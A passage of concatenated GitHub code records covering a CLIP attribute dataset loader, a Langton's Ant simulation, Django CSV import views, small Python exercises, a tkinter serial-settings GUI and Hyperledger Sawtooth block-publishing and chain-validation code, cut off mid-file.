= Prompter()\n\n \n def __len__(self):\n return len(self.idx_list)\n\n def __getitem__(self, index):\n name, idx = self.idx_list[index] # self.idx_list: [[\"CGQA\", 20877], [\"CGQA\": 23], ...]\n dset = self.datasets[name]\n item = dset[idx] # 从子数据集中获取数据,具体参考每个数据集专用的dataset\n verb_id = item[dset.repeat_time] \n try:\n verb_str = dset.attr_list[verb_id]\n except KeyError:\n print(dset.attr_list, verb_id)\n \n #verb_str = purify_verb(verb_str)\n \n item[dset.repeat_time] = self.verb2id_o4a[str(verb_str)] # item\n\n return item\n\n\n\n @cached_property\n def prompt_token_per_class(self) -> List[torch.Tensor]:\n all_prompts = []\n \n for verb_str_list in self.verb_str_per_id:\n prompts = []\n for verb_str in verb_str_list:\n prompts += self.prompter.list_all(verb_str)\n all_prompts.append(prompts)\n\n all_tokens = []\n for prompts in all_prompts:\n all_tokens.append(clipimg_model.tokenize(prompts))\n return all_tokens\n\n\nif __name__ == \"__main__\":\n\n attr_dataset = One4AllDataset_Attr(None, \"train\")\n attr_dataset[1]\n\n","repo_name":"MingyuLau/ATTRCLIP","sub_path":"independent_attr1/train_code/Attr_clip/datasets/One4AllDataset_attr.py","file_name":"One4AllDataset_attr.py","file_ext":"py","file_size_in_byte":4566,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23092352055","text":"# -*- coding: utf-8 -*-\n\"\"\"\nLangton's Ant Simulation\n\nCreated on 2021-04-25\n\n@author: Richard Wainwright, 40126812\n\nLangton's Ant is Turing complete because the ant can move back and forth\nand can read and write. 
Using this behaviour you can set up an initial\nstate for the ant to simulate logic gates and have the ant run any program\nfor you.\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\n\nclass Ant:\n \"\"\"\n Ant object to interact with lattice\n \"\"\"\n def __init__(self, x, y, direction):\n self.direction = direction\n self.x = x\n self.y = y\n\n def turn_right(self):\n self.direction = {\n 'N': 'E',\n 'E': 'S',\n 'S': 'W',\n 'W': 'N'\n }[self.direction]\n\n def turn_left(self):\n self.direction = {\n 'N': 'W',\n 'E': 'N',\n 'S': 'E',\n 'W': 'S'\n }[self.direction]\n\n def move(self):\n if self.direction == 'N':\n self.y += 1\n elif self.direction == 'E':\n self.x += 1\n elif self.direction == 'S':\n self.y -= 1\n else:\n self.x -= 1\n\n\nclass LangAnt:\n \"\"\"\n Object for lattice to demonstrate Langton's Ant\n \"\"\"\n def __init__(self, ant, rules, N=256, finite=False, fastMode=False):\n self.grid = np.zeros((N, N), np.uint)\n self.finite = finite\n self.fastMode = fastMode\n self.N = N\n self.ant = ant\n self.rules = rules\n\n def getGrid(self):\n return self.grid\n\n def step(self):\n \"\"\"\n Have the ant turn and move according to the rules\n \"\"\"\n if self.ant.x < 0 or self.ant.y < 0 or \\\n self.ant.x >= self.N or self.ant.y >= self.N:\n return self.grid\n\n new_grid = self.getGrid()\n\n if self.rules[new_grid[self.ant.x][self.ant.y]] == 'R':\n self.ant.turn_right()\n else:\n self.ant.turn_left()\n\n new_grid[self.ant.x][self.ant.y] = \\\n (new_grid[self.ant.x][self.ant.y] + 1) % len(self.rules)\n\n self.ant.move()\n\n\n\"\"\"\nrules strings: LR = basic ant\n RLR = Chaos\n LRRRRRLLR = fills grid\n RLRLRLRLRLR = quicker highway\n\"\"\"\n# get user input to create dictionary of ant movement rules\naccept = \"RL\"\nrule_string = \"\"\nwhile rule_string == \"\" or not all(c in accept for c in rule_string):\n rule_string = input(\"Enter rule string: \")\n\nrules = dict((k, v) for k, v in enumerate(rule_string))\nnum_rules = len(rule_string)\n\n# create ant and lattice\nN = 128\nmidpoint = N // 2\nant = Ant(midpoint, midpoint, 'W')\nlattice = LangAnt(ant, rules, N)\n\ncells = lattice.getGrid() # initial state\n\n# plot cells\nfig = plt.figure()\n\nimg = plt.imshow(cells, cmap=\"gnuplot2\", vmin=0, vmax=(num_rules - 1),\n animated=True)\n\n\ndef animate(i):\n \"\"\"perform animation step\"\"\"\n global lattice\n\n lattice.step()\n cells_updated = lattice.getGrid()\n\n img.set_array(cells_updated)\n\n return img,\n\n\ninterval = 0 # ms\n\n# animate 24 frames with interval, calling animate function at each frame\nani = animation.FuncAnimation(fig, animate, frames=24, interval=interval,\n blit=True)\n\nplt.show()\n","repo_name":"YanJiangJerry/COMP2048","sub_path":"ass03/lang_ant/lang_ant.py","file_name":"lang_ant.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14737790462","text":"import numpy as np\nimport sys\nimport math\nimport matplotlib.pyplot as plt\n\nn=sys.argv[1]\nm=int(n)\npi=np.pi\nal=np.random.random(m)\n\na=al*2*pi\nx=[]\ny=[]\nr=[]\nN=[]\n\nfor i in range(0,m):\n x.append(0)\n y.append(0)\n r.append(0)\n N.append(0)\n\nfor i in range(m):\n x[i]=x[i-1]+np.cos(a[i])\n y[i]=y[i-1]+np.sin(a[i])\n r[i]=r[i-1]+np.sqrt((x[i]*x[i])+(y[i]*y[i]))\n 
N[i]=i+1\n\nplt.plot(N,r)\nplt.show()\n\n","repo_name":"henrymmg/Laboratorio_computacional","sub_path":"browniano_2D.py","file_name":"browniano_2D.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16435247715","text":"from django.shortcuts import render\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nimport pandas as pd\nfrom .models import *\nfrom django.apps import apps\nfrom datetime import datetime\nfrom django_countries import countries\nimport re\n \n# Create your views here.\n\n@api_view(['GET'])\ndef import_accounts(request):\n file = 'mediafiles/import_data/all_accounts.csv'\n df = pd.read_csv(file)\n # df = df.drop_duplicates(subset=['Account Name'])\n # df = df.iloc[]\n # print(df.shape[0])\n\n # return Response({'account imported':'account imported'})\n\n for index, row in df.iterrows():\n print(index)\n if str(row['Email'])=='nan':\n email = ''\n else:\n email = row['Email']\n\n if str(row['GST ID'])=='nan':\n gst_id = ''\n else:\n gst_id = row['GST ID']\n\n if str(row['Status'])=='nan':\n is_active = False\n elif row['Status']=='Active':\n is_active = True\n else:\n is_active = False\n\n if str(row['Account Type'])=='nan':\n account_type = None\n else:\n account_type = row['Account Type']\n\n if str(row['Phone'])=='nan':\n phone_number = ''\n else:\n phone_number = row['Phone']\n\n if str(row['IATA'])=='nan':\n iata = ''\n else:\n iata = row['IATA']\n\n if str(row['Rate setup - Rate code'])=='nan':\n rate_code = None\n else:\n rate_code = RateCode.objects.get(rate_code= row['Rate setup - Rate code'])\n\n print(row['Address'])\n\n account_name, created = Account.objects.update_or_create(\n account_name=row['Account Name'],\n account_type = account_type,\n email =email,\n phone_number = phone_number,\n defaults={\n 'address_line_1' : row['Address'],\n 'iata':iata,\n 'gst_id':gst_id,\n 'is_btc_approved':row['Is BTC Approved'],\n 'rate_code':rate_code,\n 'is_active': is_active}\n )\n\n return Response({'account imported':'account imported'})\n\n@api_view(['GET'])\ndef import_bookers(request):\n file = 'mediafiles/import_data/all_bookers.csv'\n df = pd.read_csv(file)\n\n\n for index, row in df.iterrows():\n print(index)\n if str(row['Company'])!= 'nan':\n if Account.objects.filter(account_name = row['Company']).count()>1:\n Account.objects.filter(account_name = row['Company'])[0]\n else:\n account = Account.objects.get(account_name = row['Company'])\n else:\n account = None\n # account = Account.objects.first()\n\n booker, created = Booker.objects.update_or_create(\n account = account,\n name = row['Name'],\n email = row['Email'],\n phone_number = row['Phone'],\n )\n\n return Response({'bookers imported':'bookers imported'})\n\n@api_view(['GET'])\ndef import_guests(request):\n file = 'mediafiles/import_data/all_guests.csv'\n df = pd.read_csv(file)\n df = df.iloc[23400:]\n # print(dict(countries))\n # email = 'thejo.k.@naturalremedies.com'\n\n # print(email)\n # return Response({'guests imported':'guests imported'})\n # if \".\" in email[:email.index(\"@\")]:\n # print(\"There is a period before the @ symbol.\")\n # else:\n # print(\"There is no period before the @ symbol.\")\n\n # GuestProfile.objects.all().delete()\n for index, row in df.iterrows():\n\n print(index)\n print(row['Name'])\n\n if str(row['Date Of Birth']) == 'nan':\n dob = None\n else:\n dob = datetime.strptime(str(row['Date Of Birth']), \"%d-%b-%Y\")\n dob = dob\n\n 
if str(row['Phone']) == 'nan':\n phone_number = ''\n else:\n phone_number = row['Phone']\n\n if str(row['Status']) == 'nan':\n guest_status = ''\n else:\n guest_status = row['Status']\n\n if str(row['Nationality']) == 'nan':\n nationality = ''\n else:\n COUNTRY_DICT = dict(countries)\n\n if row['Nationality'] == 'United States':\n row['Nationality'] = 'United States of America'\n\n if row['Nationality'] == 'Russian Federation':\n row['Nationality'] = 'Russia'\n\n if row['Nationality'] == 'Ireland {Republic}':\n row['Nationality'] = 'Ireland'\n\n if row['Nationality'] == 'Korea South':\n row['Nationality'] = 'South Korea'\n\n if row['Nationality'] == 'Korea North':\n row['Nationality'] = 'North Korea'\n\n if row['Nationality'] == 'Trinidad & Tobago':\n row['Nationality'] = 'Trinidad and Tobago'\n\n if row['Nationality'] == 'Czech Republic':\n row['Nationality'] = 'Czechia'\n\n if row['Nationality'] == 'Swaziland':\n row['Nationality'] = 'Eswatini'\n\n nationality = list(filter(lambda x: COUNTRY_DICT[x] == row['Nationality'], COUNTRY_DICT))[0]\n \n\n if str(row['GST']) == 'nan':\n gst_id = ''\n else:\n gst_id = row['GST']\n\n\n if str(row['Email']) == 'nan':\n email = ''\n else:\n email = row['Email']\n\n for index, char in enumerate(email):\n if char == '@':\n if email[index - 1]=='.':\n new_email = email[:index-1] + email[index:]\n email = new_email\n break\n\n if \"_\" in email[email.find(\"@\"):]:\n email = email.replace(\"_\", \"-\")\n\n index = email.find(\"@\")\n\n if '.' == email[index-1]:\n email = email[:index-1]+email[index:]\n print(email)\n\n if '..' in email[:index]:\n email = email.replace('..','.',1)\n\n if str(row['Corporate']) == 'nan':\n company = None\n else:\n if Account.objects.filter(account_name = row['Corporate']).count()>1:\n company = Account.objects.filter(account_name = row['Corporate'])[0]\n else:\n company = Account.objects.get(account_name = row['Corporate'])\n\n if str(row['Name']) == 'nan':\n name = 'nan'\n else:\n split_string = row['Name'].split('.')\n salutation = split_string[0]\n name = '.'.join(split_string[1:])\n salutation=salutation.strip()\n name=name.strip()\n if name =='':\n name = 'nan'\n\n if str(row['Source']) == 'Simple Guest':\n continue\n\n guest, created = GuestProfile.objects.update_or_create(\n last_name = name,\n salutation = salutation,\n email = email,\n phone_number = phone_number,\n defaults = \n {\n 'guest_status' : guest_status,\n 'address_line_1' : row['Address'],\n 'gst_id':gst_id,\n 'nationality':nationality,\n 'dob' : dob,\n 'company' : company,\n 'guest_type':row['Source'],\n }\n )\n\n return Response({'guests imported':'guests imported'})","repo_name":"pranavdrake/pms_api","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14128682940","text":"\"\"\"\nIf Else statement in python is used to check various conditions inside a code\nNote: If we use if instead of elif in all if else statements, python interpreter will check all the conditions\neven after the desired condition is met, which is not a efficient way of coding.\n\"\"\"\n\n# Using in & not in operator in if else:\n\nage = int(input())\nlst = [10, 11, 12]\n\nif age in lst:\n print(\"You will get a candy\")\nelif age not in lst and age<60:\n print(\"You will get a Toffee\")\nelif age >= 60 and age < 100:\n print(\"You will get a coffee\")\nelif age>=100 and age :\n print(\"You will get a Cup of 
Tea\")","repo_name":"puja809/Python","sub_path":"IfElse.py","file_name":"IfElse.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22269174350","text":"class Solution:\n def countCharacters(self, words: List[str], chars: str) -> int:\n charsFreq={}\n for char in chars:\n charsFreq[char]=1+charsFreq.get(char,0)\n \n ans=0\n for word in words:\n tmp={}\n for char in word:\n tmp[char]=1+tmp.get(char,0)\n res=True\n for key in tmp.keys():\n if charsFreq.get(key,None) and tmp[key]<=charsFreq[key]:\n res=True\n else:\n res=False\n break\n if res:\n ans+=len(word)\n return ans\n","repo_name":"ofmukesh/Learning","sub_path":"DailyChallenge/countCharacters.py","file_name":"countCharacters.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21113797871","text":"'''\nimport tkinter\nwin = tkinter.Tk()\nwin.geometry(\"{}x{}\".format(300,250)\n\nbt = tkinter.Button(win,text = \"Quit\")\nbt.grid(row=0,column=2)\n#lb_test = tkinter.Label(win, text=\"label Create\")\nlb_test = tkinter.Label(win, text=\"label Create\")\nlb_test.grid(row=0, column=1)\nwin.mainloop()\n'''\n'''\nimport tkinter\ndef change_bg():\n\tbtn.configure(background = \"green\")\nmywin = tkinter.Tk()\nmywin.geometry(\"{}x{}\".format(200,200))\nframe_up = tkinter.Frame(mywin, height = 60, width = 90, background = \"blue\")\nframe_down = tkinter.Frame(mywin, height = 30, width = 90, background = \"red\")\nframe_up.pack()\nframe_down.pack()\nbtn = tkinter.Button(frame_down, text = \"click\", command = change_bg,\nforeground = \"white\", background = \"black\",\nactiveforeground = \"blue\",\nactivebackground = \"#FF007F\")\nbtn.pack()\nmywin.mainloop()\n'''\nimport tkinter\n\ndef f_comport():\n\tv_comport.set(v_comport.get()+1)\n\ndef f_baud():\n\tnumber.set(number.get()+100)\ndef f_dbit():\n\tv_dbit.set(v_dbit.get()+2)\n\ndef f_sbit():\n\tv_sbit.set(v_sbit.get()+1)\n\ndef f_okbtn():\n\tprint(\"data saved and serial ComPort setting\")\n\ndef f_ccbtn():\n\tprint(\"shut down cc btn\")\n\nmywin = tkinter.Tk()\nmywin.geometry(\"200x300\")\n\nframe = tkinter.Frame(mywin)\nframe.pack()\n\n\nv_comport = tkinter.IntVar(value = 0)\n#\nbutton1 = tkinter.Button(frame, text = \"ComPort\", command = f_comport)\nbutton1.pack()\n#\nlabel1 = tkinter.Label(frame, text = \"start\", textvariable = v_comport)\nlabel1.pack()\n\n\n\nnumber = tkinter.IntVar(value = 0)\n#\nbutton1 = tkinter.Button(frame, text = \"baud rate\", command = f_baud)\nbutton1.pack()\n#\nlabel1 = tkinter.Label(frame, text = \"start\", textvariable = number)\nlabel1.pack()\n\n\n\n\nv_dbit = tkinter.IntVar(value = 0)\n#\nbutton2 = tkinter.Button(frame, text = \"data bit\", command = f_dbit)\nbutton2.pack()\n#\nlabel2 = tkinter.Label(frame, text = \"start\", textvariable = v_dbit)\nlabel2.pack()\n\n\nv_sbit = tkinter.IntVar(value = 0)\n#\nbutton2 = tkinter.Button(frame, text = \"Stop bit\", command = f_sbit)\nbutton2.pack()\n#\nlabel2 = tkinter.Label(frame, text = \"start\", textvariable = v_sbit)\nlabel2.pack()\n\nok_btn = tkinter.Button(frame,text = \"OK\",command = f_okbtn)\nok_btn.pack()\n\ncc_btn = tkinter.Button(frame,text = \"cancel\",command = 
f_ccbtn)\ncc_btn.pack()\n\nmywin.mainloop()","repo_name":"d-h-k/PyTerm","sub_path":"Module/superpi.py","file_name":"superpi.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2656526966","text":"import cv2\nimport img_processing2\nimport matplotlib.pyplot as plt\nimg2 = cv2.imread(\"./base10.jpg\")\n\ncolor = ('b','g','r')\nfor i,col in enumerate(color):\n histr = cv2.calcHist([img2],[i],None,[256],[0,256])\n plt.plot(histr,color = col)\n plt.xlim([0,256])\n #histr += histr\n\n\n\n\nplt.savefig(\"hist9.png\")\nplt.show()","repo_name":"Naoya-Tagawa/3dprinter_visual_impaired","sub_path":"color.py","file_name":"color.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35153757907","text":"from concurrent.futures import ThreadPoolExecutor\nimport logging\nimport queue\nfrom threading import RLock\nfrom threading import Thread\nimport time\nimport copy\nimport random\nimport string\n\nfrom sawtooth_validator.scheduler.serial import SchedulerError\nfrom sawtooth_validator.server.messages import BlockRequestMessage, \\\n BlockMessage\nfrom sawtooth_validator.protobuf.block_pb2 import BlockHeader\n\nfrom sawtooth_validator.journal.block_wrapper import BlockWrapper\nfrom sawtooth_validator.journal.block_wrapper import BlockState\nfrom sawtooth_validator.journal.block_wrapper import BlockStatus\n\nLOGGER = logging.getLogger(__name__)\n\n\nNULLIDENTIFIER = \"0000000000000000\"\n\n\ndef _generate_id(length=16):\n return ''.join(\n random.SystemRandom().choice(string.ascii_uppercase + string.digits)\n for _ in range(length))\n\n\nclass BlockPublisher(object):\n \"\"\"\n Responsible for generating new blocks and publishing them when the\n Consensus deems it appropriate.\n \"\"\"\n def __init__(self,\n consensus,\n transaction_executor,\n send_message,\n squash_handler):\n self._lock = RLock()\n self._candidate_block = None # the next block in potentia\n self._consensus = consensus # the consensus object.\n self._transaction_executor = transaction_executor\n self._pending_batches = [] # batches we are waiting for\n self._validated_batches = []\n self._send_message = send_message\n self._scheduler = None\n self._chain_head = None\n self._squash_handler = squash_handler\n\n def _build_block(self, chain_head):\n \"\"\" Build a candidate block\n \"\"\"\n if self._chain_head is None:\n block_header = self.generate_genesis_block()\n else:\n block_header = BlockHeader(\n block_num=chain_head.block_num + 1,\n previous_block_id=chain_head.header_signature)\n self._consensus.initialize_block(block_header)\n\n # create a new scheduler\n # TBD move factory in to executor for easier mocking --\n # Yes I want to make fun of it.\n self._scheduler = self._transaction_executor.create_scheduler(\n self._squash_handler, chain_head.state_root_hash)\n\n self._transaction_executor.execute(self._scheduler)\n for batch in self._pending_batches:\n self._scheduler.add_batch(batch)\n self._pending_batches = []\n block = BlockWrapper(block_header)\n return block\n\n def _sign_block(self, block):\n \"\"\" The block should be complete and the final\n signature from the publishing validator(this validator) needs to\n be added.\n \"\"\"\n # Temp signature creation to use as identifier\n block.set_signature(_generate_id())\n return block\n\n def on_batch_received(self, batch):\n \"\"\"\n A new batch is received, send it for 
validation\n :param block:\n :return:\n \"\"\"\n with self._lock:\n self._pending_batches.append(batch)\n if self._scheduler:\n try:\n self._scheduler.add_batch(batch)\n except SchedulerError:\n pass\n\n def on_chain_updated(self, chain_head,\n committed_batches=None,\n uncommitted_batches=None):\n \"\"\"\n The existing chain has been updated, the current head block has\n changed.\n\n chain_head: the new head of block_chain\n committed_batches:\n uncommitted_batches: the list of transactions if any that are now\n de-committed due to the switch in forks.\n\n :return:\n \"\"\"\n with self._lock:\n LOGGER.info(\n 'Chain updated, new head: num=%s id=%s state=%s prev=%s',\n chain_head.block_num,\n chain_head.header_signature,\n chain_head.state_root_hash,\n chain_head.previous_block_id)\n self._chain_head = chain_head\n if self._candidate_block is not None and \\\n chain_head is not None and \\\n chain_head.header_signature == \\\n self._candidate_block.previous_block_id:\n # nothing to do. We are building of the current head.\n # This can happen after we publish a block and speculatively\n # create a new block.\n return\n else:\n # TBD -- we need to rebuild the pending transaction queue --\n # which could be an unknown set depending if we switched forks\n\n # new head of the chain.\n self._candidate_block = self._build_block(chain_head)\n\n def _finalize_block(self, block):\n if self._scheduler:\n self._scheduler.finalize()\n self._scheduler.complete(block=True)\n\n # Read valid batches from self._scheduler\n pending_batches = copy.copy(self._pending_batches)\n self._pending_batches = []\n\n state_hash = None\n for batch in pending_batches:\n batch_status = self._scheduler.batch_status(batch.header_signature)\n # if a batch_status is None, this means that the executor never\n # received the batch and it should be added to\n # the pending_batches\n if batch_status is None:\n self._pending_batches.append(batch)\n elif batch_status.valid:\n self._validated_batches.append(batch)\n state_hash = batch_status.state_hash\n\n block.add_batches(self._validated_batches)\n self._validated_batches = []\n\n # might need to take state_hash\n self._consensus.finalize_block(block.block_header)\n if state_hash is not None:\n block.set_state_hash(state_hash)\n self._sign_block(block)\n return block\n\n def on_check_publish_block(self, force=False):\n \"\"\"\n Ask the consensus module if it is time to claim the candidate block\n if it is then, claim it and tell the world about it.\n :return:\n \"\"\"\n with self._lock:\n if self._candidate_block is None and len(self._pending_batches) \\\n != 0:\n self._candidate_block = self._build_block(self._chain_head)\n\n if self._candidate_block and \\\n (force or len(self._pending_batches) != 0) and \\\n self._consensus.check_publish_block(self._candidate_block):\n candidate = self._candidate_block\n self._candidate_block = None\n candidate = self._finalize_block(candidate)\n # if no batches are in the block, do not send it out\n if len(candidate.batches) == 0:\n LOGGER.info(\"No Valid batches added to block, dropping %s\",\n candidate.header_signature)\n return\n msg = BlockMessage(candidate.get_block())\n self._send_message(msg)\n\n LOGGER.info(\"Claimed Block: %s\", candidate.header_signature)\n\n # create a new block based on this one -- opportunistically\n # assume the published block is the valid block.\n self.on_chain_updated(candidate)\n\n def generate_genesis_block(self):\n genesis_header = BlockHeader(previous_block_id=NULLIDENTIFIER,\n block_num=0)\n\n # Small 
hack here not asking consensus if it is happy.\n\n self._candidate_block = \\\n self._finalize_block(BlockWrapper(genesis_header))\n return self._candidate_block\n\n\nclass BlockValidator(object):\n \"\"\"\n Responsible for validating a block, handles both chain extensions and fork\n will determine if the new block should be the head of the chain and\n\n \"\"\"\n def __init__(self, consensus,\n block_store,\n new_block,\n chain_head,\n request_block_cb,\n done_cb,\n executor,\n squash_handler):\n self._consensus = consensus\n self._block_store = block_store\n self._new_block = new_block\n self._chain_head = chain_head\n self._request_block_cb = request_block_cb\n self._done_cb = done_cb\n self._executor = executor\n self._squash_handler = squash_handler\n self._commit_new_block = False\n\n def commit_new_block(self):\n return self._commit_new_block\n\n @property\n def new_block(self):\n return self._new_block\n\n @property\n def chain_head(self):\n return self._chain_head\n\n def _validate_block(self, block_state):\n if block_state.status == BlockStatus.Valid:\n return True\n elif block_state.status == BlockStatus.Invalid:\n return False\n else:\n valid = True\n # verify header_signature\n\n if valid:\n if len(block_state.block.batches) > 0:\n scheduler = self._executor.create_scheduler(\n self._squash_handler,\n self.chain_head.block.state_root_hash)\n self._executor.execute(scheduler)\n\n for i in range(len(block_state.block.batches) - 1):\n scheduler.add_batch(block_state.block.batches[i])\n scheduler.add_batch(block_state.block.batches[-1],\n block_state.block.state_root_hash)\n scheduler.finalize()\n scheduler.complete(block=True)\n state_hash = None\n for i in range(len(block_state.block.batches)):\n batch_status = scheduler.batch_status(\n block_state.block.batches[i].header_signature)\n # If the batch_status is None, the executor did not\n # receive the batch\n if (batch_status is not None) and batch_status.valid:\n state_hash = batch_status.state_hash\n else:\n valid = False\n if block_state.block.state_root_hash != state_hash:\n valid = False\n if valid:\n valid = self._consensus.verify_block(block_state)\n\n # Update the block store\n block_state.weight = \\\n self._consensus.compute_block_weight(block_state)\n block_state.status = BlockStatus.Valid if \\\n valid else BlockStatus.Invalid\n self._block_store[block_state.block.header_signature] = block_state\n return valid\n\n def run(self):\n LOGGER.info(\"Starting block validation of : %s\",\n self._new_block.block.header_signature)\n current_chain = [] # ordered list of the current chain\n new_chain = []\n\n new_block_state = self._new_block\n current_block_state = self._chain_head\n # 1) find the common ancestor of this block in the current chain\n # Walk back until we have both chains at the same length\n while new_block_state.block.block_num > \\\n current_block_state.block.block_num\\\n and new_block_state.block.previous_block_id != \\\n NULLIDENTIFIER:\n new_chain.append(new_block_state)\n try:\n new_block_state = \\\n self._block_store[\n new_block_state.block.previous_block_id]\n except KeyError:\n # required block is missing\n self._request_block_cb(\n new_block_state.block.previous_block_id, self)\n return\n\n while current_block_state.block.block_num > \\\n new_block_state.block.block_num \\\n and new_block_state.block.previous_block_id != \\\n NULLIDENTIFIER:\n current_chain.append(current_block_state)\n current_block_state = \\\n self._block_store[\n current_block_state.block.previous_block_id]\n\n # 2) now we have 
both chain at the same block number\n # continue walking back until we find a common block.\n while current_block_state.block.header_signature != \\\n new_block_state.block.header_signature:\n if current_block_state.block.previous_block_id == \\\n NULLIDENTIFIER or \\\n new_block_state.block.previous_block_id == \\\n NULLIDENTIFIER:\n # We are at a genesis block and the blocks are not the\n # same\n LOGGER.info(\"Block rejected due to wrong genesis : %s %s\",\n current_block_state.block.header_signature,\n new_block_state.block.header_signature)\n\n self._done_cb(self)\n return\n new_chain.append(new_block_state)\n new_block_state = \\\n self._block_store[\n new_block_state.block.previous_block_id]\n\n current_chain.append(current_block_state)\n current_block_state = \\\n self._block_store[\n current_block_state.block.previous_block_id]\n\n # 3) We now have the root of the fork.\n # determine the validity of the new fork\n for block in reversed(new_chain):\n if not self._validate_block(block):\n LOGGER.info(\"Block validation failed: %s\",\n block)\n self._done_cb(self)\n return\n\n # 4) new chain is valid... should we switch to it?\n LOGGER.info(\"Finished block validation of XXXX: %s, %s\",\n new_chain[0].weight, self._chain_head.weight)\n self._commit_new_block = new_chain[0].weight > self._chain_head.weight\n\n # Tell the journal we are done\n self._done_cb(self)\n LOGGER.info(\"Finished block validation of : %s\",\n self._new_block.block.header_signature)\n\n\nclass ChainController(object):\n \"\"\"\n To evaluating new blocks to determine if they should extend or replace\n the current chain. If they are valid extend the chain.\n \"\"\"\n def __init__(self,\n consensus,\n block_store,\n send_message,\n executor,\n transaction_executor,\n on_chain_updated,\n squash_handler):\n self._lock = RLock()\n self._consensus = consensus\n self._block_store = block_store\n self._send_message = send_message\n self._executor = executor\n self._transaction_executor = transaction_executor\n self._notifiy_on_chain_updated = on_chain_updated\n self._sqaush_handler = squash_handler\n\n self._blocks_requested = {} # a set of blocks that were requested.\n self._blocks_processing = {} # a set of blocks that are\n # currently being processed.\n self._blocks_pending = {} # set of blocks that the previous block\n # is being processed. Once that completes this block will be\n # scheduled for validation.\n\n try:\n self._chain_head = \\\n self._block_store[self._block_store[\"chain_head_id\"]]\n\n LOGGER.info(\"Chain controller initialized with chain head: %s\",\n self._chain_head.block.header_signature)\n except Exception as e:\n LOGGER.error(\"Invalid block store. 
Head of the block chain cannot \"\n \"be determined: %s\", e)\n raise\n\n self._notifiy_on_chain_updated(self._chain_head.block)\n\n @property\n def chain_head(self):\n return self._chain_head\n\n def _verify_block(self, block_state):\n validator = BlockValidator(\n consensus=self._consensus,\n new_block=block_state,\n chain_head=self._chain_head,\n block_store=self._block_store,\n request_block_cb=self._request_block,\n done_cb=self.on_block_validated,\n executor=self._transaction_executor,\n squash_handler=self._sqaush_handler)\n self._blocks_processing[block_state.block.header_signature] = validator\n self._executor.submit(validator.run)\n\n def _request_block(self, block_id, validator):\n # TBD add request time and time out\n self._blocks_requested[block_id] = validator\n self._send_message(BlockRequestMessage(block_id))\n\n def on_block_validated(self, validator):\n \"\"\"\n Message back from the block validator\n :param block:\n :return:\n \"\"\"\n with self._lock:\n LOGGER.info(\"on_block_validated : %s\",\n validator.new_block.block.header_signature)\n # remove from the processing list\n del self._blocks_processing[\n validator.new_block.block.header_signature]\n\n # if the head has changed, since we started the work.\n if validator.chain_head != self._chain_head:\n # chain has advanced since work started.\n # the block validation work we have done is saved.\n self._verify_block(validator.new_block)\n elif validator.commit_new_block():\n self._chain_head = validator.new_block\n self._block_store[\"chain_head_id\"] = \\\n self._chain_head.block.header_signature\n LOGGER.info(\"Chain head updated to: %s\",\n self._chain_head.block.header_signature)\n # tell everyone else the chain is updated\n self._notifiy_on_chain_updated(self._chain_head.block)\n\n pending_blocks = \\\n self._blocks_pending.pop(\n self._chain_head.block.previous_block_id, [])\n for pending_block in pending_blocks:\n self._verify_block(pending_block)\n\n def on_block_received(self, block):\n with self._lock:\n if block.header_signature in self._block_store:\n # do we already have this block\n return\n header = BlockHeader()\n header.ParseFromString(block.header)\n block = BlockWrapper(header, block)\n\n block_state = BlockState(block_wrapper=block, weight=0,\n status=BlockStatus.Unknown)\n self._block_store[block.header_signature] = block_state\n self._blocks_pending[block.header_signature] = []\n if block.header_signature in self._blocks_requested:\n # is it a requested block\n # route block to the validator that requested\n validator = self._blocks_requested.pop(block.header_signature)\n if validator.chain_head.block.header_signature != \\\n self._chain_head.block.header_signature:\n # the head of the chain has changed start over\n self._verify_block(validator.new_block)\n else:\n self._executor.submit(validator.run)\n elif block.previous_block_id in self._blocks_processing:\n # if the previous block is being processed...put it in a wait\n # queue\n pending_blocks = \\\n self._blocks_pending.get(block.previous_block_id,\n [])\n pending_blocks.append(block_state)\n self._blocks_pending[block.previous_block_id] = \\\n pending_blocks\n else:\n # schedule this block for validation.\n self._verify_block(block_state)\n\n\nclass Journal(object):\n \"\"\"\n Manages the block chain, This responsibility boils down\n 1) to evaluating new blocks to determine if they should extend or replace\n the current chain. 
Handled by the ChainController/\n 2) Claiming new blocks, handled by the BlockPublisher\n\n This object provides the threading and event queue for the processors.\n\n \"\"\"\n\n class _ChainThread(Thread):\n def __init__(self, chain_controller, block_queue):\n Thread.__init__(self)\n self._block_publisher = chain_controller\n self._block_queue = block_queue\n self._exit = False\n\n def run(self):\n while True:\n try:\n block = self._block_queue.get(timeout=0.1)\n self._block_publisher.on_block_received(block)\n except queue.Empty:\n time.sleep(0.1)\n if self._exit:\n return\n\n def stop(self):\n self._exit = True\n\n class _PublisherThread(Thread):\n def __init__(self, block_publisher, batch_queue):\n Thread.__init__(self)\n self._block_publisher = block_publisher\n self._batch_queue = batch_queue\n self._exit = False\n\n def run(self):\n while True:\n try:\n batch = self._batch_queue.get(timeout=0.1)\n self._block_publisher.on_batch_received(batch)\n except queue.Empty:\n time.sleep(0.1)\n\n self._block_publisher.on_check_publish_block()\n if self._exit:\n return\n\n def stop(self):\n self._exit = True\n\n def __init__(self,\n consensus,\n block_store,\n send_message,\n transaction_executor,\n squash_handler,\n first_state_root):\n self._consensus = consensus\n self._block_store = block_store\n self._send_message = send_message\n self._squash_handler = squash_handler\n\n self._block_publisher = BlockPublisher(\n 